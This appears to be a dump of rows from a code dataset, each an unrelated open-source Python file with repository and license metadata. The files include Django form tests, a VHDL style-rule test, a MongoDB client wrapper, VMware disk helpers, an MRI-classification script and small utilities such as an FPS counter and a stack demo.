| cpatrick/ITK-RemoteIO | Examples/Registration/ImageRegistration5.py | Python | apache-2.0 | 6,093 |
import os
import unittest
from vsg.rules import iteration_scheme
from vsg import vhdlFile
from vsg.tests import utils
# Directory containing this test module and its VHDL fixture files.
sTestDir = os.path.dirname(__file__)

# Pre-parse the fixture once at import time; eError is checked in setUp.
lFile, eError = vhdlFile.utils.read_vhdlfile(os.path.join(sTestDir, 'rule_101_test_input.vhd'))

dIndentMap = utils.read_indent_file()

# Expected file contents after fixing; get_lines() keeps a leading '' entry.
lExpected = []
lExpected.append('')
utils.read_file(os.path.join(sTestDir, 'rule_101_test_input.fixed.vhd'), lExpected)
class test_iteration_scheme_rule(unittest.TestCase):
    """Tests for iteration_scheme rule 101: violation detection and fixing."""

    def setUp(self):
        # Fresh vhdlFile per test so fixes do not leak between test methods.
        self.oFile = vhdlFile.vhdlFile(lFile)
        self.assertIsNone(eError)
        self.oFile.set_indent_map(dIndentMap)

    def test_rule_101(self):
        oRule = iteration_scheme.rule_101()
        self.assertTrue(oRule)
        self.assertEqual(oRule.name, 'iteration_scheme')
        self.assertEqual(oRule.identifier, '101')

        # The fixture is expected to violate the rule on these line numbers.
        lExpected = [10]
        oRule.analyze(self.oFile)
        self.assertEqual(lExpected, utils.extract_violation_lines_from_violation_object(oRule.violations))

    def test_fix_rule_101(self):
        oRule = iteration_scheme.rule_101()

        oRule.fix(self.oFile)

        # Fixed file must match the .fixed.vhd fixture exactly.
        lActual = self.oFile.get_lines()
        self.assertEqual(lExpected, lActual)

        # Re-analysis after fixing must report no remaining violations.
        oRule.analyze(self.oFile)
        self.assertEqual(oRule.violations, [])
| jeremiah-c-leary/vhdl-style-guide | vsg/tests/iteration_scheme/test_rule_101.py | Python | gpl-3.0 | 1,275 |
from django import forms
from nose.tools import eq_
import test_utils
from . import user, profile
from ..adapters import (KumaAccountAdapter, USERNAME_CHARACTERS,
USERNAME_EMAIL)
from ..forms import UserProfileEditForm
class TestUserProfileEditForm(test_utils.TestCase):
    """Validation tests for UserProfileEditForm: usernames and website URLs."""

    def test_username(self):
        """bug 753563: Support username changes"""
        test_user = user(save=True)
        data = {
            'username': test_user.username,
        }
        # Keeping one's own username must validate...
        form = UserProfileEditForm(data, instance=profile(test_user))
        eq_(True, form.is_valid())
        # let's try this with the username above
        # ...but claiming another user's existing username must fail.
        test_user2 = user(save=True)
        form = UserProfileEditForm(data, instance=profile(test_user2))
        eq_(False, form.is_valid())

    def test_https_profile_urls(self):
        """bug 733610: Profile URLs should allow https"""
        # (protocol prefix, whether the form should accept it)
        protos = (
            ('http://', True),
            ('ftp://', False),
            ('gopher://', False),
            ('https://', True),
        )
        # (websites_* field suffix, bare URL without protocol)
        sites = (
            ('website', 'mozilla.org'),
            ('twitter', 'twitter.com/lmorchard'),
            ('github', 'github.com/lmorchard'),
            ('stackoverflow', 'stackoverflow.com/users/testuser'),
            ('linkedin', 'www.linkedin.com/in/testuser'),
        )
        self._assert_protos_and_sites(protos, sites)

    def test_linkedin_public_profile_urls(self):
        """
        Bug 719651 - Profile field validation for LinkedIn is not
        valid for international profiles
        https://bugzil.la/719651
        """
        protos = (
            ('http://', True),
            ('https://', True),
        )
        sites = (
            ('linkedin', 'www.linkedin.com/in/testuser'),
            ('linkedin', 'www.linkedin.com/pub/testuser/0/1/826')
        )
        self._assert_protos_and_sites(protos, sites)

    def _assert_protos_and_sites(self, protos, sites):
        """Assert form validity for every (protocol, site) combination.

        protos: iterable of (protocol prefix, expected validity).
        sites:  iterable of (websites field name, URL without protocol).
        """
        profile_edit_user = user(save=True)
        profile_edit_profile = profile(profile_edit_user)
        for proto, expected_valid in protos:
            for name, site in sites:
                url = '%s%s' % (proto, site)
                data = {
                    "email": "lorchard@mozilla.com",
                    "websites_%s" % name: url
                }
                form = UserProfileEditForm(data, instance=profile_edit_profile)
                result_valid = form.is_valid()
                eq_(expected_valid, result_valid)
class AllauthUsernameTests(test_utils.TestCase):
    """Username validation performed by the allauth account adapter."""

    def test_email_username(self):
        """
        Trying to use an email address as a username fails, with a
        message saying an email address can't be used as a username.
        """
        # Both a full address and a bare '@'-prefixed name must be rejected.
        bad_usernames = (
            'testuser@example.com',
            '@testuser',
        )
        adapter = KumaAccountAdapter()
        for username in bad_usernames:
            self.assertRaisesMessage(forms.ValidationError,
                                     USERNAME_EMAIL,
                                     adapter.clean_username,
                                     username)

    def test_bad_username(self):
        """
        Illegal usernames fail with our custom error message rather
        than the misleading allauth one which suggests '@' is a legal
        character.
        """
        adapter = KumaAccountAdapter()
        self.assertRaisesMessage(forms.ValidationError,
                                 USERNAME_CHARACTERS,
                                 adapter.clean_username,
                                 'dolla$dolla$bill')
| mastizada/kuma | kuma/users/tests/test_forms.py | Python | mpl-2.0 | 3,616 |
# Copyright (C) 2013 Project Hatohol
#
# This file is part of Hatohol.
#
# Hatohol is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Hatohol is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Hatohol. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
from django.db import transaction
import smartfield
class UserConfig(models.Model):
    """Per-user configuration entry keyed by (item_name, user_id).

    ``value`` goes through SmartField, which (de)serializes arbitrary Python
    values transparently.
    """
    item_name = models.CharField(max_length=255, db_index=True)
    user_id = models.IntegerField(db_index=True)
    value = smartfield.SmartField()

    def __init__(self, *args, **kwargs):
        # Wrap a raw `value` so SmartField can recognize it as a user-config
        # value and serialize it appropriately.
        if 'value' in kwargs:
            value = kwargs['value'];
            kwargs['value'] = smartfield.SmartField.UserConfigValue(value)
        models.Model.__init__(self, *args, **kwargs)

    def __unicode__(self):
        return '%s (%d)' % (self.item_name, self.user_id)

    @classmethod
    def get_object(cls, item_name, user_id):
        """Get an object of UserConfig

        Args:
            item_name: A configuration item
            user_id: A user ID for the configuration
        Returns:
            If the matched item exists, it is returned. Otherwise, None is
            returned.
        """
        objs = UserConfig.objects.filter(item_name=item_name).filter(user_id=user_id)
        if not objs:
            return None
        # (item_name, user_id) is expected to identify at most one row.
        assert len(objs) == 1
        return objs[0]

    @classmethod
    def get(cls, item_name, user_id):
        """Get a user configuration

        Args:
            item_name: A configuration item
            user_id: A user ID for the configuration
        Returns:
            If the matched item exists, its value is returned. Otherwise,
            None is returned.
        """
        obj = cls.get_object(item_name, user_id)
        if obj is None:
            return None
        return obj.value

    @classmethod
    @transaction.commit_on_success
    def get_items(cls, item_name_list, user_id):
        """Fetch several configuration items in one transaction.

        Returns a dict mapping each item name to its value (or None).
        """
        items = {}
        for item_name in item_name_list:
            value = cls.get(item_name, user_id)
            items[item_name] = value
        return items

    def _store_without_transaction(self):
        # Upsert: reuse an existing row's primary key so save() updates it
        # instead of inserting a duplicate.
        obj = self.get_object(self.item_name, self.user_id)
        if obj is not None:
            self.id = obj.id  # to update on save()
        self.save()

    @transaction.commit_on_success
    def store(self):
        """Insert if the record with item_name and user_id doesn't exist.
        Otherwise update with the value of this object.
        """
        self._store_without_transaction()

    @classmethod
    @transaction.commit_on_success
    def store_items(cls, items, user_id):
        """Store a dict of {item_name: value} for one user atomically."""
        for name in items:
            value = items[name]
            user_conf = UserConfig(item_name=name, user_id=user_id, value=value)
            user_conf._store_without_transaction()
class LogSearchSystem(models.Model):
    """Registration of an external log-search backend."""
    # Backend type identifier and the base URL used to reach it.
    type = models.CharField(max_length=128)
    base_url = models.CharField(max_length=512)
| project-hatohol/hatohol-14.12 | client/hatohol/models.py | Python | gpl-2.0 | 3,386 |
""":mod:`wand.font` --- Fonts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. versionadded:: 0.3.0
:class:`Font` is an object which takes the :attr:`~Font.path` of font file,
:attr:`~Font.size`, :attr:`~Font.color`, and whether to use
:attr:`~Font.antialias`\\ ing. If you want to use font by its name rather
than the file path, use TTFQuery_ package. The font path resolution by its
name is a very complicated problem to achieve.
.. seealso::
TTFQuery_ --- Find and Extract Information from TTF Files
TTFQuery builds on the `FontTools-TTX`_ package to allow the Python
programmer to accomplish a number of tasks:
- query the system to find installed fonts
- retrieve metadata about any TTF font file
- this includes the glyph outlines (shape) of individual code-points,
which allows for rendering the glyphs in 3D (such as is done in
OpenGLContext)
- lookup/find fonts by:
- abstract family type
- proper font name
- build simple metadata registries for run-time font matching
.. _TTFQuery: http://ttfquery.sourceforge.net/
.. _FontTools-TTX: http://sourceforge.net/projects/fonttools/
"""
from . import assertions
from .color import Color
from .compat import string_type, text
__all__ = ('Font',)
class Font(tuple):
    """Font struct which is a subtype of :class:`tuple`.

    :param path: the path of the font file
    :type path: :class:`str`, :class:`basestring`
    :param size: the size of typeface. 0 by default which means *autosized*
    :type size: :class:`numbers.Real`
    :param color: the color of typeface. black by default
    :type color: :class:`~wand.color.Color`
    :param antialias: whether to use antialiasing. :const:`True` by default
    :type antialias: :class:`bool`
    :param stroke_color: optional color to outline typeface.
    :type stroke_color: :class:`~wand.color.Color`
    :param stroke_width: optional thickness of typeface outline.
    :type stroke_width: :class:`numbers.Real`

    .. versionchanged:: 0.3.9
       The ``size`` parameter becomes optional.  Its default value is
       0, which means *autosized*.

    .. versionchanged:: 0.5.0
       Added ``stroke_color`` & ``stroke_width`` parameters.

    """

    def __new__(cls, path, size=0, color=None, antialias=True,
                stroke_color=None, stroke_width=None):
        assertions.assert_string(path=path)
        assertions.assert_real(size=size)
        # Fill color defaults to black; plain color-name strings are accepted.
        if color is None:
            color = Color('black')
        elif isinstance(color, string_type):
            color = Color(color)
        assertions.assert_color(color=color)
        # Stroke settings are optional; validate only what the caller passed.
        if stroke_color:
            if isinstance(stroke_color, string_type):
                stroke_color = Color(stroke_color)
            assertions.assert_color(stroke_color=stroke_color)
        if stroke_width is not None:
            assertions.assert_real(stroke_width=stroke_width)
        path = text(path)
        # Tuple layout: (path, size, color, antialias, stroke_color, stroke_width)
        return tuple.__new__(cls, (path, size, color, bool(antialias),
                                   stroke_color, stroke_width))

    @property
    def path(self):
        """(:class:`basestring`) The path of font file."""
        return self[0]

    @property
    def size(self):
        """(:class:`numbers.Real`) The font size in pixels."""
        return self[1]

    @property
    def color(self):
        """(:class:`wand.color.Color`) The font color."""
        return self[2]

    @property
    def antialias(self):
        """(:class:`bool`) Whether to apply antialiasing (``True``)
        or not (``False``).

        """
        return self[3]

    @property
    def stroke_color(self):
        """(:class:`wand.color.Color`) The stroke color."""
        return self[4]

    @property
    def stroke_width(self):
        """(:class:`numbers.Real`) The width of the stroke line."""
        return self[5]

    def __repr__(self):
        return '{0.__module__}.{0.__name__}({1})'.format(
            type(self),
            tuple.__repr__(self)
        )
| dahlia/wand | wand/font.py | Python | mit | 4,021 |
"""
* *******************************************************
* Copyright (c) VMware, Inc. 2016-2018. All Rights Reserved.
* SPDX-License-Identifier: MIT
* *******************************************************
*
* DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
* EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
* WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
* NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""
__author__ = 'VMware, Inc.'
import pyVim.task
from pyVmomi import vim
from samples.vsphere.common.vim.inventory import get_datastore_mo
from samples.vsphere.common.vim import datastore_file
def create_vmdk(service_instance, datacenter_mo, datastore_path):
    """Create a 4 GB seSparse VMDK at *datastore_path* in the datacenter.

    Blocks until the creation task completes and returns the task result.
    """
    disk_spec = vim.VirtualDiskManager.SeSparseVirtualDiskSpec(
        diskType='seSparse', adapterType='lsiLogic',
        capacityKb=1024 * 1024 * 4)
    disk_manager = service_instance.content.virtualDiskManager
    task = disk_manager.CreateVirtualDisk(datastore_path, datacenter_mo, disk_spec)
    pyVim.task.WaitForTask(task)
    print("Created VMDK '{}' in Datacenter '{}'".format(
        datastore_path, datacenter_mo.name))
    return task.info.result
def delete_vmdk(service_instance, datacenter_mo, datastore_path):
    """Delete the VMDK at *datastore_path*, blocking until the task finishes."""
    disk_manager = service_instance.content.virtualDiskManager
    delete_task = disk_manager.DeleteVirtualDisk(datastore_path, datacenter_mo)
    pyVim.task.WaitForTask(delete_task)
def detect_vmdk(client, soap_stub, datacenter_name, datastore_name,
                datastore_path):
    """Return True if a file exists at *datastore_path* on the datastore.

    Returns False when the datastore itself cannot be resolved.
    """
    datastore_mo = get_datastore_mo(client,
                                    soap_stub,
                                    datacenter_name,
                                    datastore_name)
    if not datastore_mo:
        return False
    # `exists` already yields a boolean; no if/else ladder needed.
    dsfile = datastore_file.File(datastore_mo)
    return dsfile.exists(datastore_path)
| pgbidkar/vsphere-automation-sdk-python | samples/vsphere/common/vim/vmdk.py | Python | mit | 2,080 |
from bokeh.plotting import figure, output_file, show

# Build a 400x400 plot containing a single translucent circle glyph at (2, 3).
p = figure(width=400, height=400)
p.circle(2, 3, radius=.5, alpha=0.5)

# Write the plot to a standalone HTML file and open it in a browser.
output_file('out.html')
show(p)
| Serulab/Py4Bio | code/ch14/basiccircle.py | Python | mit | 157 |
from .base import StructuredModel
from .crf import CRF
from .grid_crf import GridCRF, DirectionalGridCRF
from .graph_crf import GraphCRF
from .chain_crf import ChainCRF
from .latent_grid_crf import LatentGridCRF, LatentDirectionalGridCRF
from .latent_graph_crf import LatentGraphCRF
from .latent_node_crf import LatentNodeCRF, EdgeFeatureLatentNodeCRF
from .unstructured_svm import BinaryClf, MultiClassClf
from .multilabel_svm import MultiLabelClf
from .edge_feature_graph_crf import EdgeFeatureGraphCRF
# Public API of the models subpackage; keep in sync with the imports above.
__all__ = ["StructuredModel", "CRF", "GridCRF", "GraphCRF",
           "DirectionalGridCRF", "BinaryClf", "LatentGridCRF",
           "LatentDirectionalGridCRF", "MultiClassClf", "LatentGraphCRF",
           "MultiLabelClf", "ChainCRF", "LatentNodeCRF", "EdgeFeatureGraphCRF",
           "EdgeFeatureLatentNodeCRF"]
| d-mittal/pystruct | pystruct/models/__init__.py | Python | bsd-2-clause | 822 |
from osgeo import ogr
def addField(shapefile, field):
    """Append an integer attribute column named *field* to *shapefile*.

    The shapefile is opened in update mode, the field is created on its
    first layer, and the datasource is dereferenced to flush changes.
    """
    # Flag 1 opens the datasource for update so the schema can be modified.
    source = ogr.Open(shapefile, 1)
    layer = source.GetLayer()
    # Removed an unused `layer_defn` local; CreateField works on the layer.
    new_field = ogr.FieldDefn(field, ogr.OFTInteger)
    layer.CreateField(new_field)
    # GDAL idiom: dropping the last reference closes and flushes the file.
    source = None
# addField('A_Roads.shp','example') add the 'example' field to A_Roads shapefile
| zero-point/hackattack | addField.py | Python | mit | 324 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import pymongo
class MongoClient:
    """ mongodb client

    Thin convenience wrapper around pymongo bound to one database.
    NOTE: Python 2 syntax (print statements); uses legacy pymongo APIs
    (insert/update/remove/collection_names).
    """
    def __init__(self, host = "localhost", port = 27017, dbName = "test", debug = False):
        # Connect eagerly and select the working database.
        self.host = host
        self.port = port
        self.conn = pymongo.MongoClient(host, port)
        self.db = self.conn[dbName]
        self.debug = debug
        if(debug):
            print "host: " + host
            print "port: " + str(port)
            print "dbName: " + dbName

    def authenticate(self, username, passwd):
        # Authenticate against the selected database; True on success.
        ret = self.db.authenticate(username, passwd)
        return ret

    def getDBInfo(self):
        # NOTE(review): stub — always returns None; not implemented yet.
        return

    def getCollections(self):
        # Names of all collections in the current database.
        return self.db.collection_names()

    def insert(self, collection, doc):
        # Insert one document; returns its _id.
        coll = self.db[collection]
        ret = coll.insert(doc)
        return ret

    def get_one(self, collection, condition, fields = None):
        # First document matching `condition`, or None.
        coll = self.db[collection]
        return coll.find_one(condition, fields)

    def get(self, collection, condition, fields = None):
        # Cursor over all documents matching `condition`.
        coll = self.db[collection]
        cursor = coll.find(condition, fields)
        return cursor

    def update(self, collection, condition, operation, upsert=False, manipulate=False, safe=False, multi=False, _check_keys=False):
        # Apply `operation` to documents matching `condition`.
        # NOTE(review): `_check_keys` is accepted but never forwarded — confirm intent.
        coll = self.db[collection]
        ret = coll.update(condition, operation, upsert = upsert, manipulate=manipulate, safe=safe, multi=multi)
        return ret

    def remove(self, collection, condition):
        # Delete all documents matching `condition`.
        coll = self.db[collection]
        return coll.remove(condition)

    def next(self, cursor):
        # Next document from `cursor`, or None when exhausted.
        try:
            obj = cursor.next()
        except StopIteration:
            return None
        return obj
| huangby/javaweb | pythonfile/util/mongo.py | Python | epl-1.0 | 1,780 |
#!/usr/bin/env python
import os
import numpy as np
import nibabel as nib
import sklearn as skl
import pandas as pd
from sklearn.svm import LinearSVC
from sklearn.decomposition import PCA
import random
from sklearn import datasets, linear_model
from xml.dom import minidom
import lib_IO
# ---- Dataset constants ---------------------------------------------------
training_samples = 278
test_samples = 138
# Raw MRI volume dimensions; `final` is the flattened voxel count per scan.
x_shape = 176
y_shape = 208
z_shape = 176
final = x_shape*y_shape*z_shape
sample_size = 1000
samples = np.zeros((sample_size,3))
"""for i in range(0,sample_size):
samples[i,0]=random.randrange(0, 176)
samples[i,1]=random.randrange(0, 208)
samples[i,2]=random.randrange(0, 176)"""
train = np.zeros((training_samples,final))
test = np.zeros((test_samples,final))
train_labels = pd.read_csv('targets.csv', header=None)
counter = 0
cols = []
print("Traversing images and shaping to feature vector")
# Load every training scan and flatten it into one row of `train`.
for file in os.listdir('data/set_train'):
    print(counter)
    file_path = os.path.join('data/set_train', file)
    img = nib.load(file_path)
    img_data = img.get_data()
    img_data = img_data[:,:,:,0]
    train[counter,:] = img_data.reshape(final)
    counter += 1
# idx marks voxel columns where ANY training scan has intensity < 10;
# those (near-background) columns are dropped from both sets below.
mask = (train < 10)
idx = mask.any(axis=0)
counter = 0
for file in os.listdir('data/set_test'):
    print(counter)
    file_path = os.path.join('data/set_test', file)
    img = nib.load(file_path)
    img_data = img.get_data()
    img_data = img_data[:,:,:,0]
    test[counter,:] = img_data.reshape(final)
    counter += 1
train = train[:,~idx]
test = test[:,~idx]
print(train.shape)
print(train)
print(test.shape)
print(test)
#train = train[:,:10]
#test = test[:,:10]
print("Dimensionality Reduction")
"""pca = PCA(150, 'randomized',
whiten=True).fit(train)
train_pca = pca.transform(train)
test_pca = pca.transform(test)
print(train_pca.shape)"""
"""print("Train Linear SVC")
model = LinearSVC()
model.fit(train,train_labels.values.ravel())
print("Begin predictions")
print(model.predict(test))"""
# Create linear regression object
regr = linear_model.LinearRegression()
# Train the model using the training sets
regr.fit(train, train_labels.values.ravel())
print(regr.predict(test))
print("Next")
model = LinearSVC()
model.fit(train,train_labels.values.ravel())
y_predict = model.predict(test)
print("Done")
# NOTE(review): write_Y is defined further down the file, so this module-level
# call raises NameError at runtime — move the function defs above this line.
# Also np.arange(start=1, stop=138) yields only 137 ids for 138 predictions;
# stop should presumably be test_samples + 1. Confirm and fix.
write_Y("prediction.csv",y_predict,np.arange(start=1,stop=138,dtype=np.uint32))
# returns numpy array of data. Dimensions: samplesCount X 6
# features are [abs CSF volume, abs GM volume, abs WM volume, rel CSF volume, rel GM volume, rel WM volume]
# samples count:
# training: 278
# testing: 138
def parseDataSetXML(samplesCount, filepath):
    """Parse per-sample XML volume reports into a feature matrix.

    Each XML report names its sample via the <file> element, whose second
    "_"-separated token is the 1-based sample index. The six features per
    row are [abs CSF, abs GM, abs WM, rel CSF, rel GM, rel WM] volumes.

    Parameters:
        samplesCount: number of samples (rows of the returned matrix);
                      training: 278, testing: 138 per the file comments.
        filepath: directory containing one XML report per sample.

    Returns:
        numpy.ndarray of shape (samplesCount, 6); rows whose report is
        missing or incomplete are left all-zero.
    """
    # Local import keeps this fix self-contained (re not imported at top).
    import re

    # Matches signed decimal numbers with optional exponent.
    _number = re.compile(r'[-+]?\d*\.?\d+(?:[eE][-+]?\d+)?')

    def _first_text(doc, tag):
        # Text content of the first <tag> element, or None when absent/empty.
        nodes = doc.getElementsByTagName(tag)
        if nodes and nodes[0].childNodes:
            return nodes[0].childNodes[0].data
        return None

    features_matrix = np.zeros((samplesCount, 6))
    for f in os.listdir(filepath):
        if f == ".DS_Store":  # macOS metadata file, not a report
            continue
        xmldoc = minidom.parse(os.path.join(filepath, f))
        filename = _first_text(xmldoc, 'file')  # original misspelled 'filenmae'
        index = filename.split("_")[1]
        vol_abs_CGW = _first_text(xmldoc, 'vol_abs_CGW')
        vol_rel_CGW = _first_text(xmldoc, 'vol_rel_CGW')
        if vol_abs_CGW is None or vol_rel_CGW is None:
            # Original only printed and fell through, then hit the (possibly
            # undefined) variables below -- skip the sample instead.
            print("Attributes missing at index " + index)
            continue
        # Extract the three numbers robustly instead of fixed split positions,
        # which glued a trailing "]" onto the last value (float() error).
        absvals = [float(v) for v in _number.findall(vol_abs_CGW)[:3]]
        relvals = [float(v) for v in _number.findall(vol_rel_CGW)[:3]]
        if len(absvals) < 3 or len(relvals) < 3:
            print("Attributes missing at index " + index)
            continue
        features_matrix[int(index) - 1, :] = np.array(absvals + relvals)
    return features_matrix
def write_Y(fname, Y_pred, Ids):
    """Write predictions as a two-column CSV with header 'Id,Prediction'.

    Parameters:
        fname: output file path.
        Y_pred: 1-D array of integer predictions.
        Ids: 1-D array of integer ids, same length as Y_pred.

    When the lengths disagree, an error is printed and nothing is written
    (behavior kept from the original).
    """
    if Y_pred.shape[0] != Ids.shape[0]:
        print("error Ids- dimension of y matrix does not match number of expected predictions")
        print('y: {0} - expected: {1}'.format(Y_pred.shape,Ids.shape))
    else:
        # 'with' guarantees the handle is flushed and closed
        # (the original opened the file and never closed it).
        with open(fname, 'w+') as f:
            np.savetxt(fname=f, X=np.column_stack([Ids, Y_pred]),
                       fmt=['%d', '%d'], delimiter=',',
                       header='Id,Prediction', comments='')
| tobiagru/ML | src/predict.py | Python | gpl-3.0 | 4,147 |
import shutil
import tempfile

from nose.tools import *

from holland.lib.lvm import LogicalVolume
from holland.lib.lvm.snapshot import *

from tests.constants import *
class TestSnapshot(object):
    """Exercises the Snapshot finite-state machine against the test LV."""

    def setup(self):
        # Fresh mount point for every test case.
        self.tmpdir = tempfile.mkdtemp()

    def teardown(self):
        shutil.rmtree(self.tmpdir)

    def _make_snapshot(self):
        # Build the (logical volume, snapshot) pair used by every test:
        # a 1-extent snapshot of the configured test volume, mounted
        # under this test's temp directory.
        lv = LogicalVolume.lookup('%s/%s' % (TEST_VG, TEST_LV))
        snapshot = Snapshot(lv.lv_name + '_snapshot', 1, self.tmpdir)
        return lv, snapshot

    def test_snapshot_fsm(self):
        # The bare FSM should run to completion with no callbacks.
        lv, snapshot = self._make_snapshot()
        snapshot.start(lv)

    def test_snapshot_fsm_with_callbacks(self):
        # No-op callbacks must not disturb the FSM.
        lv, snapshot = self._make_snapshot()

        def handle_event(event, *args, **kwargs):
            pass

        snapshot.register('pre-mount', handle_event)
        snapshot.register('post-mount', handle_event)
        snapshot.start(lv)

    def test_snapshot_fsm_with_failures(self):
        # A raising callback at each lifecycle event must surface as
        # CallbackFailuresError and leave no stale signal handlers behind.
        lv, snapshot = self._make_snapshot()

        def bad_callback(event, *args, **kwargs):
            raise Exception("Oooh nooo!")

        lifecycle_events = ('initialize', 'pre-snapshot', 'post-snapshot',
                            'pre-mount', 'post-mount', 'pre-unmount', 'post-unmount',
                            'pre-remove', 'post-remove', 'finish')
        for evt in lifecycle_events:
            snapshot.register(evt, bad_callback)
            assert_raises(CallbackFailuresError, snapshot.start, lv)
            snapshot.unregister(evt, bad_callback)
            if snapshot.sigmgr._handlers:
                raise Exception("WTF. sigmgr handlers still exist when checking event => %r", evt)
| m00dawg/holland | plugins/holland.lib.lvm/tests/xfs/test_snapshot.py | Python | bsd-3-clause | 1,824 |
import time
class FPS_counter:
    """Frame-rate tracker with an optional upper FPS limit.

    Call ``update()`` once per frame. The reported frame time is an
    exponential moving average (90% history / 10% latest), so the fps
    readout is smoothed rather than instantaneous.
    """

    def __init__(self, limit=0):
        """limit: maximum frames per second; 0 (default) disables limiting."""
        self._time = time.time()  # seconds since epoch of the last frame
        self._dt = 0              # smoothed frame time, seconds (0 until first update)
        self._min_dt = 1 / limit if limit > 0 else 0  # shortest allowed frame
        self._limited = False     # True when the last frame had to sleep

    def _get_dt(self):
        # Raw time elapsed since the last recorded frame.
        return time.time() - self._time

    def update(self):
        """Record the end of a frame, sleeping if it finished too fast."""
        dt = self._get_dt()
        if dt < self._min_dt:
            # Frame beat the limit: sleep off the difference and account
            # the frame at exactly the minimum duration.
            time.sleep(self._min_dt - dt)
            self._time += self._min_dt
            self._dt = self._dt * 0.9 + self._min_dt * 0.1
            self._limited = True
        else:
            self._time += dt
            self._dt = self._dt * 0.9 + dt * 0.1
            self._limited = False

    @property
    def dt_remaining(self):
        """Seconds left before the limit allows the next frame (>= 0)."""
        return max(self._min_dt - self._get_dt(), 0)

    @property
    def last_dt(self):
        """Smoothed duration of recent frames, in seconds."""
        return self._dt

    def __str__(self):
        # BUG FIX: _dt is 0 until the first update(); the original divided
        # by zero here. Report 0.00fps for a counter that has never updated.
        if self._dt == 0:
            return '0.00fps-'
        return '{:.2f}fps{}'.format(1 / self._dt, '+' if self._limited else '-')
| ngcm/interactive-fluid-demo | util/FPS_counter.py | Python | mit | 987 |
# This file is part of 'NTLM Authorization Proxy Server'
# Copyright 2001 Dmitry A. Rozmanov <dima@xenon.spb.ru>
#
# NTLM APS is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# NTLM APS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the sofware; see the file COPYING. If not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
import time
#-----------------------------------------------------------------------
class Logger:
    """Appends runtime messages to a log file, gated by a debug level."""

    def __init__(self, log_name, debug_level=1):
        """Logger init routine.

        Parameters:
            log_name: path of the log file (opened in append mode per call).
            debug_level: 0 silences all output; any truthy value logs.
        """
        self.log_name = log_name
        self.debug_level = debug_level

    def log(self, str):  # parameter name kept for API compatibility, though it shadows the builtin
        """Append the given string verbatim to the log file.

        No-op when debug_level is falsy. Opening per call keeps each
        message flushed immediately; 'with' guarantees the handle is
        closed even on write errors (the original leaked it in that case).
        """
        if self.debug_level:
            with open(self.log_name, 'a') as fptr:
                fptr.write(str)
| nka11/KaraCos-Desktop | py/utils/ntlmaps/logger.py | Python | gpl-3.0 | 1,681 |
#!/usr/bin/python
import sys
def push(stack_list, input):
    """Push *input* onto the top of *stack_list* (in place).

    NOTE(review): the parameter name 'input' shadows the builtin;
    kept because it is part of the public signature.
    """
    stack_list.append(input)
def pop(stack_array):
    """Remove and return the top element, or 0 when the stack is empty."""
    if stack_array:
        return stack_array.pop()
    return 0
def peep(stack_array):
    """Return the top element without removing it, or 0 when empty."""
    if not stack_array:
        return 0
    return stack_array[-1]
def is_empty(stack_array):
    """Return True when the stack holds no elements, else False.

    The length comparison already yields a bool, so the original
    if/else returning True/False literals was redundant.
    """
    return len(stack_array) == 0
def exit_code():
    """Terminate the program by raising SystemExit via sys.exit()."""
    sys.exit()
if __name__=="__main__":
stack_list = []
while True:
value = 0
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
print ("Enter the operation to be performed on stack: ")
print ("1. Print")
print ("2. Push")
print ("3. Pop")
print ("4. Is Empty")
print ("5. Peep")
print ("0. Exit")
try:
value = int(raw_input("Enter the option: "))
except (TypeError, NameError, RuntimeError, ValueError):
value = 6
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
if value == 1:
print stack_list
elif value == 2:
input_value = input("Enter the value to be pushed: ")
push(stack_list, input_value)
print ("Now the stack looks like: ")
print stack_list
del input_value
elif value == 3:
pop_value = pop(stack_list)
print ("Poped value is : " +str(pop_value))
print ("Now the stack looks like")
print stack_list
elif value == 4:
print "Stack is empty: " +str(is_empty(stack_list))
elif value == 5:
print "Peep value for stack: " +str(peep(stack_list))
elif value == 0:
print "Good Byee... :)"
exit_code()
else:
print "Please enter a valid input"
del value
| RGU5Android/PythonLectureNotes | HomeWork/10-06-14/stack.py | Python | gpl-2.0 | 1,993 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.